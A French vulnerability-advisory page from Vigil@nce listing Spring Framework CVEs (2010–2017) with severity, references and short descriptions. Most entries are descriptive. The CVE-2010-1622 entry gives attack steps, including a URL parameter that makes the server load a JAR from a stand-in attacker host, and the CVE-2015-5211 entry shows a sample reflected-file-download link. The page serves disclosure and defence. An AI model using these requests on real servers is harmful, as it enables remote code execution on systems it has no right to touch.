L'équipe Vigil@nce veille les vulnérabilités publiques qui affectent votre parc informatique, puis propose des correctifs sécurité, une base et des outils pour y remédier.

Vulnérabilités informatiques de Spring Framework

avis de vulnérabilité informatique CVE-2017-8028

Spring-LDAP : élévation de privilèges via userSearch/STARTTLS

Synthèse de la vulnérabilité

Un attaquant peut contourner les restrictions via userSearch/STARTTLS de Spring-LDAP, afin d'élever ses privilèges.
Produits concernés : Debian, Spring Framework.
Gravité : 2/4.
Conséquences : accès/droits administrateur, accès/droits privilégié.
Provenance : client intranet.
Date création : 17/10/2017.
Références : CVE-2017-8028, DLA-1180-1, DSA-4046-1, RHSA-2018:0319-01, VIGILANCE-VUL-24159.

Description de la vulnérabilité

Un attaquant peut contourner les restrictions via userSearch/STARTTLS de Spring-LDAP, afin d'élever ses privilèges.
Bulletin Vigil@nce complet... (Essai gratuit)

bulletin de vulnérabilité CVE-2016-9878

Spring Framework : traversée de répertoire via ResourceServlet

Synthèse de la vulnérabilité

Un attaquant peut traverser les répertoires via ResourceServlet de Spring Framework, afin de lire un fichier situé hors de la racine du service.
Produits concernés : Fedora, QRadar SIEM, MariaDB ~ précis, MySQL Community, MySQL Enterprise, Percona Server, XtraDB Cluster, Spring Framework.
Gravité : 2/4.
Conséquences : lecture de données.
Provenance : client internet.
Date création : 22/12/2016.
Références : 1996375, 2015813, CVE-2016-9878, FEDORA-2016-f341d71730, RHSA-2017:3115-01, VIGILANCE-VUL-21453.

Description de la vulnérabilité

Le produit Spring Framework dispose d'un service web.

Cependant, les données provenant de l'utilisateur sont directement insérées dans un chemin d'accès. Les séquences comme "/.." permettent alors de remonter dans l'arborescence.

Un attaquant peut donc traverser les répertoires via ResourceServlet de Spring Framework, afin de lire un fichier situé hors de la racine du service.
Bulletin Vigil@nce complet... (Essai gratuit)

avis de vulnérabilité informatique CVE-2016-5007

Spring Framework : élévation de privilèges via une configuration incohérente

Synthèse de la vulnérabilité

Un attaquant peut accéder à des parties normalement privées d'une application réalisée avec Spring Framework, afin d'obtenir des informations.
Produits concernés : QRadar SIEM, Spring Framework.
Gravité : 2/4.
Conséquences : accès/droits administrateur, accès/droits privilégié.
Provenance : client internet.
Date création : 08/07/2016.
Date révision : 11/07/2016.
Références : 2015813, CVE-2016-5007, VIGILANCE-VUL-20049.

Description de la vulnérabilité

Le produit Spring Framework sert à réaliser des applications Web.

Le module d'extension Spring Security gère les autorisations d'accès. Spring Frameword et Spring Security ont chacun une configuration indiquant comment traiter une classe d'URL. Cependant, des différences dans la normalisation des motifs d'URLs entre les 2 modules Spring font que des parties de l'application qui devraient être à accès restreint par Spring Security sont en fait directement traitées par Spring Framework et sont donc librement accessibles.

Un attaquant peut donc accéder à des parties normalement privées d'une application réalisée avec Spring Framework, afin d'obtenir des informations.
Bulletin Vigil@nce complet... (Essai gratuit)

bulletin de vulnérabilité CVE-2016-2173

Spring AMQP : exécution de code via DefaultDeserializer

Synthèse de la vulnérabilité

Un attaquant peut envoyer un message malveillant vers Spring AMQP, afin d'exécuter du code.
Produits concernés : Fedora, Spring Framework.
Gravité : 3/4.
Conséquences : accès/droits privilégié, accès/droits utilisateur.
Provenance : document.
Date création : 12/04/2016.
Références : CVE-2016-2173, FEDORA-2016-6cf17ad0df, FEDORA-2016-f099190fee, VIGILANCE-VUL-19343.

Description de la vulnérabilité

Le produit Spring AMQP utilise org.springframework.core.serializer.DefaultDeserializer pour désérialiser des données.

Cependant, les données sérialisées peuvent contenir un objet conduisant à l'exécution de code.

Un attaquant peut donc envoyer un message malveillant vers Spring AMQP, afin d'exécuter du code.
Bulletin Vigil@nce complet... (Essai gratuit)

annonce de vulnérabilité informatique CVE-2015-5258

Spring Social Core : Cross Site Request Forgery

Synthèse de la vulnérabilité

Un attaquant peut provoquer un Cross Site Request Forgery de Spring Social Core, afin de forcer la victime à effectuer des opérations.
Produits concernés : Fedora, Spring Framework.
Gravité : 2/4.
Conséquences : accès/droits utilisateur.
Provenance : client internet.
Date création : 13/11/2015.
Références : CVE-2015-5258, FEDORA-2016-4d0e6ba888, VIGILANCE-VUL-18307.

Description de la vulnérabilité

Le produit Spring Social Core dispose d'un service web.

Cependant, l'origine des requêtes n'est pas validée. Elles peuvent par exemple provenir d'une image affichée dans un document HTML.

Un attaquant peut donc provoquer un Cross Site Request Forgery de Spring Social Core, afin de forcer la victime à effectuer des opérations.
Bulletin Vigil@nce complet... (Essai gratuit)

vulnérabilité informatique CVE-2015-5211

Spring Framework : exécution de code via Reflected File Download

Synthèse de la vulnérabilité

Un attaquant peut provoquer un Reflected File Download avec Spring Framework, afin d'inviter la victime à exécuter du code malveillant.
Produits concernés : Fedora, Spring Framework.
Gravité : 1/4.
Conséquences : accès/droits utilisateur, création/modification de données.
Provenance : document.
Date création : 16/10/2015.
Références : CVE-2015-5211, FEDORA-2015-693035254a, FEDORA-2015-9295d75400, VIGILANCE-VUL-18125.

Description de la vulnérabilité

Les attaques de type RFD (Reflected File Download) s'appliquent sur un site web avec les caractéristiques suivantes :
 - acceptation des urls terminant par ";/fichier.extension" (où l'extension est "bat" par exemple)
 - génération d'un entête Content-Type correspondant à un document téléchargeable comme un fichier, ou bien un entête Content-Type vide
 - génération du corps de la page à l'aide de paramètres de l'url (?para=contenu)
Lorsque ces conditions sont réunies, un attaquant peut inviter la victime à cliquer sur un lien comme :
  http://example.com/;fichier.bat?para=calc.exe
La victime est alors convaincue de télécharger un fichier provenant de exemple.com, alors que son navigateur web va enregistrer le fichier "fichier.bat" contenant la ligne "calc.exe". Ensuite, si la victime exécute le fichier bat, la calculatrice démarre.

Cependant, la classe HttpMessageConverter de Spring Framework réunit les conditions d'une attaque RFD.

Un attaquant peut donc provoquer un Reflected File Download avec Spring Framework, afin d'inviter la victime à exécuter du code malveillant.
Bulletin Vigil@nce complet... (Essai gratuit)

bulletin de vulnérabilité CVE-2015-3192

Pivotal Spring Framework : surconsommation de mémoire via des entités XML

Synthèse de la vulnérabilité

Un attaquant peut provoquer une surconsommation de mémoire dans Pivotal Spring Framework, afin de mener un déni de service.
Produits concernés : Fedora, Spring Framework.
Gravité : 1/4.
Conséquences : déni de service du serveur, déni de service du service, déni de service du client.
Provenance : document.
Date création : 01/07/2015.
Références : CVE-2015-3192, FEDORA-2015-11165, FEDORA-2015-11184, RHSA-2016:1218-01, RHSA-2016:1219-01, RHSA-2016:1592-01, RHSA-2016:1593-01, RHSA-2016:2035-01, RHSA-2016:2036-01, VIGILANCE-VUL-17283.

Description de la vulnérabilité

Le produit Pivotal Spring Framework peut traiter des documents XML d'origine externe.

Les entités définies dans le fragment interne de la DTD sont prises en compte par défaut. Cependant, il n'y a pas de limite sur la taille de la mémoire allouée pour traiter un document. Il est alors possible de définir des entités dont l'expansion produit des chaines énormes qui feront échouer le traitement. L'exception déclenchée peut toutefois être capturée, afin d'éviter la terminaison de l'application.

Un attaquant peut donc provoquer une surconsommation de mémoire dans Pivotal Spring Framework, afin de mener un déni de service.
Bulletin Vigil@nce complet... (Essai gratuit)

avis de vulnérabilité informatique CVE-2015-0201

Spring Framework : prédictibilité de SockJS

Synthèse de la vulnérabilité

Un attaquant peut prédire l'identifiant de session du client SockJS de Spring Framework, afin d'injecter des messages dans une session.
Produits concernés : Spring Framework.
Gravité : 2/4.
Conséquences : lecture de données, création/modification de données.
Provenance : serveur intranet.
Date création : 09/03/2015.
Références : CVE-2015-0201, VIGILANCE-VUL-16349.

Description de la vulnérabilité

Le produit Spring Framework propose le client TLS Java SockJS.

Cependant, l'identifiant de session de SockJS n'est pas suffisamment aléatoire.

Un attaquant peut donc prédire l'identifiant de session du client SockJS de Spring Framework, afin d'injecter des messages dans une session.
Bulletin Vigil@nce complet... (Essai gratuit)

bulletin de vulnérabilité CVE-2014-3625

Spring Framework : traversée de répertoire de MVC ResourceHttpRequestHandler

Synthèse de la vulnérabilité

Un attaquant peut traverser les répertoires dans MVC ResourceHttpRequestHandler.java de Spring Framework, afin de lire un fichier situé hors de la racine du service.
Produits concernés : QRadar SIEM, Spring Framework.
Gravité : 2/4.
Conséquences : lecture de données.
Provenance : client internet.
Date création : 12/11/2014.
Date révision : 21/11/2014.
Références : 1999395, 1999474, 1999478, 1999479, 1999488, 1999532, CVE-2014-3625, RHSA-2015:0234-01, RHSA-2015:0235-01, RHSA-2015:0236-01, RHSA-2015:0720-01, SPR-12354, VIGILANCE-VUL-15633.

Description de la vulnérabilité

Le fichier org/springframework/web/servlet/resource/ResourceHttpRequestHandler.java de Spring Framework est utilisé via "<mvc:resources>" par exemple.

Cependant, les données provenant de l'utilisateur sont directement insérées dans un chemin d'accès. Les séquences comme "/.." permettent alors de remonter dans l'arborescence.

Un attaquant peut donc traverser les répertoires dans MVC ResourceHttpRequestHandler.java de Spring Framework, afin de lire un fichier situé hors de la racine du service.
Bulletin Vigil@nce complet... (Essai gratuit)

annonce de vulnérabilité informatique CVE-2010-1622

Spring Framework : exécution de code

Synthèse de la vulnérabilité

Un attaquant peut employer une url illicite, afin de forcer le Spring Framework à charger un fichier JAR contenant du code à exécuter.
Produits concernés : Spring Framework, RHEL.
Gravité : 3/4.
Conséquences : accès/droits privilégié.
Provenance : serveur internet.
Date création : 21/06/2010.
Références : BID-40954, CERTA-2010-AVI-387, CVE-2010-1622, RHSA-2011:0175-01, VIGILANCE-VUL-9717.

Description de la vulnérabilité

Une page JSP contient du code Java dans les blocs "<%...%>". Ce code peut être placé dans le fichier de tag "META-INF/tags/MonTag.tag" qui est ensuite appelé via "<prefixe:MonTag/>". Ces fichiers tags peuvent être placés dans une archive JAR, qui contient alors un fichier "META-INF/MonTLD.tld" (Tag Library Descriptor) qui indique tous les tags disponibles.

La variable "class.classLoader.URLs[0]" indique le premier chargeur de classes à utiliser. Spring Framework permet à un attaquant de définir cette variable. Cependant, cette variable est ensuite utilisée par org.apache.jasper.compiler.TldLocationsCache.scanJars() qui charge le TLD d'un JAR.

Un attaquant peut donc (simplifié) :
 - créer une archive JAR contenant un fichier de tag avec du code Java illicite, et "META-INF/spring-form.tld" pour modifier les tags des formulaires
 - placer cette archive sur http://attaquant/illicite.jar
 - se connecter sur Spring Framework, et ajouter le paramètre suivant dans l'url d'un formulaire : class.classLoader.URLs[0]=http://attaquant/illicite.jar
La méthode scanJars() chargera alors illicite.jar, et exécutera le code.

Un attaquant peut donc employer une url illicite, afin de forcer le Spring Framework à charger un fichier JAR contenant du code à exécuter.
Bulletin Vigil@nce complet... (Essai gratuit)
Notre base de données contient d'autres bulletins. Vous pouvez utiliser un essai gratuit pour les consulter.

Consulter les informations sur Spring Framework :